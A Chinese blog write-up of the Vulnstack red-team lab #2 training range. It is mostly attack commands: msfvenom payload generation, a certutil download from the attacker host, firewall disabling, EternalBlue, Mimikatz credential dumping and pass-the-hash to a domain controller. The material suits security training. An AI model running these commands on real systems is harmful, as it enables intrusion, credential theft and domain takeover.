【内网渗透】最简明的ATT&CK实战 | Vulnstack 红队(二)

于 2024-12-05 02:46:37 发布
阅读量558 收藏 3
点赞数 8
文章标签: 内网渗透 红日靶场 渗透测试 渗透 红日靶场2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/uuzeray/article/details/144227886
版权

攻击机:

kali ip:192.168.111.10

win11 ip: 192.168.111.1

靶机:

WEB外网ip:192.168.111.80   内网ip:10.10.10.80

PC外网ip: 192.168.111.201  内网ip:10.10.10.201

DC ip: 10.10.10.10

 先fscan扫外网

./fscan -h 192.168.111.80

weblogic一把梭工具梭开

msf生成正向连接马

msfvenom -p windows/meterpreter/bind_tcp LPORT=1337 -f exe > exp.exe

关掉防火墙,下载msf马,执行

netsh advfirewall set allprofiles state off
certutil -urlcache -split -f http://192.168.111.1:1337/exp.exe
exp.exe

 kali上执行 

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.111.80
set LPORT 1337
exploit

拿到shell,顺带getsystem提权

upload fscan_win32.exe
shell C:\Oracle\Middleware\user_projects\domains\base_domain\fscan_win32.exe -h 10.10.10.0/24 -np

上传的目录是C:\Oracle\Middleware\user_projects\domains\base_domain

 内网扫出来,可以看到201和10都可以打永恒之蓝

 上传frpc搭建代理

upload frpc.ini
upload frpc.exe
shell cd C:\Oracle\Middleware\user_projects\domains\base_domain
shell frpc.exe -c frpc.ini

 尝试打永恒之蓝,均失败

proxychains4 msfconsole
use auxiliary/admin/smb/ms17_010_command
set COMMAND  'netsh advfirewall set allprofiles state off'
set RHOST 10.10.10.10
exploit
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload  payload/windows/x64/meterpreter/bind_tcp
set rhosts 10.10.10.10
run

hashdump出来发现管理员是空密码🤔 

 kiwi模块也犯病跑不出来

于是上传猕猴桃直接交互

upload mimikatz.exe
execute -i -f mimikatz.exe
sekurlsa::logonpasswords

拿到域管的hash 

 pth拿到DC

proxychains4 python psexec.py de1ay.com/administrator@10.10.10.10 -hashes ':161cff084477fe596a5db81874498a24' -codec gbk

同理pth拿到PC

proxychains4 python psexec.py de1ay.com/administrator@10.10.10.201 -hashes ':161cff084477fe596a5db81874498a24' -codec gbk

 

Z3r4y
关注
ATT&CK实战系列——红队实战()
lza20001103的博客
10-17 2898
ATT&CK实战系列——红队实战() 文章目录ATT&CK实战系列——红队实战()前言靶场搭建网络配置外网渗透内网渗透内网信息收集msf反弹shell设置路由探测内网存活主机cs上线横向移动fscan扫描内网主机端口拿下域控后记 前言 前面我们接触了vulnhub靶场和CTF综合靶场系列的练习,但是只是涉及外网到提权的渗透,没有对内网的进一步的渗透,近日刚学完内网,想巩固一下内网方面的知识,刚好看到红日有一个不错的靶场,所以来想来练练手,接下来,给大家好好演示一下噢。 靶场搭建 靶场下载
ATT&CK实战系列——红队实战()
lza20001103的博客
07-17 1458
ATT&CK实战系列——红队实战()
红日安全vulnstack-ATT&CK实战系列 红队实战()
遇事不决冲冲冲
02-05 6686
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX
ATT&CK实战系列-Vulnstack靶场内网渗透
最新发布
M372109150的博客
09-24 1296
本篇靶场红日安全内网渗透,主要要包括Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。2.Windows系统NTLM获取3.Access Token利用(MSSQL利用)4.WMI利用5.网页代理,层代理,特殊协议代理6.域内信息收集7.域漏洞利用:SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用。
红日-VulnStack靶场-ATT&CK
braty_的博客
10-01 1250
红日,cs横向移动
ATT&CK红队评估实战靶场
Blazing-Angel的博客
03-14 2049
前言 第个靶机来喽,地址:vulunstack 环境配置 大喊一声我淦!!!!! 配个网络配置弄了半天 配置信息 DC IP:10.10.10.10 OS:Windows 2012(64) 应用:AD域 WEB IP1:10.10.10.80 IP2:192.168.47.131 OS:Windows 2008(64) 应用:Weblogic 10.3.6MSSQL 2008 PC IP1:10.10.10.201 IP2:192.168.47.130 OS:Windows 7(32)
[渗透测试]ATT&CK实战 | Vulnstack 红队
Y4tacker的博客
12-06 2010
文章目录环境来源为什么写这篇文章配置nmap扫描启动smbserver共享文件服务打爆weblogic提权使用 procdump64+mimikatz 获取 win 用户明文密生成管理帐号密码用户凭证-连接域控服务器-反弹域控 shel参考文章 环境来源 来源于https://mp.weixin.qq.com/s/uLlWJdcAc6MmUyuruHygNA,尊重人家作者,还是自己去问人家要吧 为什么写这篇文章 给一些不必要细节删除,以及一些自己觉得细节的补充 配置 nmap扫描 常用端口是开放状态1
ATT&CK实战系列-红队实战()vulnstack 红日靶场
weixin_68652890的博客
05-20 1890
文章目录信息搜集主机发现端口扫描目录扫描getshell用sql向日志文件写后门getshell网站后台getshell内网信息搜集域信息搜集探测内网存活主机和端口提升权限msf会话移交cscs提权横向移动密码收集psexec横向 信息搜集 主机发现 nmap 192.168.5.0/24 端口扫描 nmap 192.168.5.174 开放3306、80端口 目录扫描 python3 dirmap.py -i http:// 192.168.5.174 -lcf 其它方法 dirsearch -u h
vulnstack-ATT&CK实战系列 红队实战()
qq_41755084的博客
02-21 557
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟 ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实 APT 实战环境,从实战中成长。虚拟机所有统一密码:hongrisec@2019漏洞详情 (qiyuanxuetang.net)
Vulnstack红日安全内网渗透靶场1实战
道阻且长,行则将至
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网域信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
ATT&CK框架
热门推荐
qq_40216188的博客
02-28 2万+
ATT&CK框架一、ATT&CK框架1.1、侦查Reconnaissance-包含10项技术1.2、资源开发Resource Development-包含6项技术1.3、初始访问Initial Access-包含9项技术 一、ATT&CK框架 序号 战术 战术功能 1 侦察 信息收集 2 资源开发 建立攻击者行动所需资源 3 初始访问 进入目标网络,获取一个入口 4 执行 运行恶意代码 5 持久化 保持攻击立足点 6 权限提升 获取高权限 7
十大常见的ATT&CK战术及技术
xnxqwzy的博客
08-01 2483
ATT&CK框架是一个网络安全综合性知识库,通过对攻击生命周期各阶段的实际观察,从而对攻击者行为进行理解与分类,已成为研究威胁模型和方法的基础工具。随着厂商及企业对该框架的广泛采用,ATT&CK知识库已公认成为了解攻击者的行为模型与技术权威。Picus研究人员从各种来源收集了超过十万真实世界威胁样本,确定了样本的战术、技术和程序(TTP),并对每个TTP进行了分类,所有样本超过180万种ATT&CK技术。PicusLabs针对此研究发布了Red。
「 网络安全常用术语解读 」网络攻击者的战术、技术和常识知识库ATT&CK详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-22 2308
ATT&CK(Adversarial Tactics, Techniques, and Common Knowledge)是一个针对现实世界观察总结得到网络攻击者的战术、技术和常识知识库。它由美国网络安全公司MITRE开发,旨在帮助网络安全专业人员更好地了解和应对网络威胁。ATT&CK知识库被用作私营部门、政府以及网络安全产品和服务社区中特定威胁模型和方法的开发基础。ATT&CK当前新版本为 v14,发布于2023年10月31,后续也会持续更新。
云原生Att&ck矩阵
weixin_45540609的博客
08-10 2181
转载自:https://developer.aliyun.com/article/765449?groupCode=aliyunsecurity 一、云上容器ATT&CK攻防矩阵概览 ATT&CK®框架(Reference ATTACK Matrix for Container on Cloud)是网络攻击中涉及的已知策略和技术的知识库。为便于企业构建容器化应用安全体系,阿里云在传统主机安全的基础上,围绕自建容器集群以及云原生容器服务场景,通过全面分析黑客攻击Docker和K8s的过程和手段,推
ATT&CK(一)之为什么要学习ATT&CK
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-28 1097
本系列旨在介绍网络红蓝对抗领域好的ATT&CK矩阵模型,以期帮助有意愿深耕在红蓝对抗领域的人员能系统性的掌握红蓝对抗领域的知识和经验。本系列将详细ATT&CK的起源、发展历史,ATT&CK矩阵相对其他High-Level红蓝对抗模型的优势,ATT&CK在红蓝对抗领域的作用,ATT&CK囊括的战术技术的组织逻辑和应用场景,以及需要动手实操学习的ATT&CK活跃的子项目AtomRedTeam。
ATT&CK(三)之ATT&CK的十四个战术
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-28 3177
ATT&CK矩阵从2018年的v8版本开始,战术阶段增加到14个战术(Tactics)阶段,此前为12个战术阶段,多增加了“侦查”、“资源建立”2个战术,以及“初始访问”、“执行”、“持久化”、“提权”、“防御绕过”、“凭据访问”、“发现”、“横向移动”、“收集”、“命令与控制”、“数据泄露”、“影响”12个战术。其中前面2个战术指的是PRE-ATT&CK阶段,后面12个战术指的是ATT&CK阶段。下图是v7版本的12个战术阶段下图是v12版本的14个战术阶段。
网络防御的艺术:解读ATT&CK模型以洞察攻击者策略
从零开始,掌握网络安全。提供全面的网络安全教程、攻防演练技巧和行业动态。
04-23 1550
网络攻击手段不断演变,防御策略也需不断更新。ATT&CK模型作为一个动态的框架,将持续更新以反映新的攻击技术。作为安全专家,我们需要持续学习,不断适应新的安全挑战。
ATT&CK框架简介 已知攻击技术汇总
whatday的专栏
03-10 1万+
一、ATT&CK框架背景介绍 MITRE是美国政府资助的一家研究机构,该公司于1958年从MIT分离出来,并参与了许多商业和高机密项目。其中包括开发FAA空中交通管制系统和AWACS机载雷达系统。MITRE在美国国家标准技术研究所(NIST)的资助下从事了大量的网络安全实践。 MITRE在2013年推出了ATT&CK模型,它是根据真实的观察数据来描述和分类对抗行为。AT...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值